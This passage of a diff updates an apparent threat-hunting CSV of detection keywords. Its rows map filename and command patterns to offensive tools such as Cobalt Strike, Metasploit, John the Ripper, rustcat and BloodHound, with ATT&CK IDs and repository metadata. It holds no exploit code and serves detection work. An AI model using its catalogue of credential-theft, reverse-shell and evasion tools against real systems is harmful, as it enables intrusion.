APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*bitquark_top100k_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" -"*bits_ntlm_token_impersonation.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bitsadmin/nopowershell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bits_ntlm_token_impersonation.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bitsadmin/nopowershell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*BitsadminStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bitshares2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*bitwarden2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bitshares2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bitwarden2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Biu-framework*","offensive_tool_keyword","Biu-framework","Biu-framework Security Scan Framework For Enterprise Intranet Based Services","T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Frameworks","https://awesomeopensource.com/project/0xbug/Biu-framework","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bkerberos_ccache_use*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkerberos_ticket_purge*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkerberos_ticket_use*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkeylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*bks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*blackarch/tree/master/packages/rustcat*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*blackarrowsec/mssqlproxy*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*blackarrowsec/pivotnacci*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" -"*blackhat-arsenal-tools*","offensive_tool_keyword","Github Username","This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. the tools are classified by category and not by session.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/toolswatch/blackhat-arsenal-tools","1","0","N/A","N/A","10","3545","1140","2023-08-14T03:46:11Z","2017-07-21T08:03:44Z" -"*blacklanternsecurity/MANSPIDER*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*blacklanternsecurity/trevorproxy*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*blacklanternsecurity/TREVORspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*blackhat-arsenal-tools*","offensive_tool_keyword","Github Username","This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. the tools are classified by category and not by session.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/toolswatch/blackhat-arsenal-tools","1","0","N/A","N/A","10","3547","1140","2023-08-14T03:46:11Z","2017-07-21T08:03:44Z" +"*blacklanternsecurity/MANSPIDER*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*blacklanternsecurity/trevorproxy*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*blacklanternsecurity/TREVORspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*Blackout.exe *","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" -"*ble_recon.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*blendin/3snake*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" -"*blindSQLPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*blockchain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ble_recon.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*blendin/3snake*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*blindSQLPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*blockchain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*blockdlls -*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*blockdlls start*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*blockdlls stop*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" @@ -7831,38 +7978,38 @@ "*bloginuser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*blogonpasswords*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bloodhound &> /dev/null &*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*bloodhound --no-sandbox*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*BloodHound-*.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*bloodhound.ad.*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*bloodhound.bin*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*bloodhound.enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*BloodHound.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*bloodhound.py *","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of 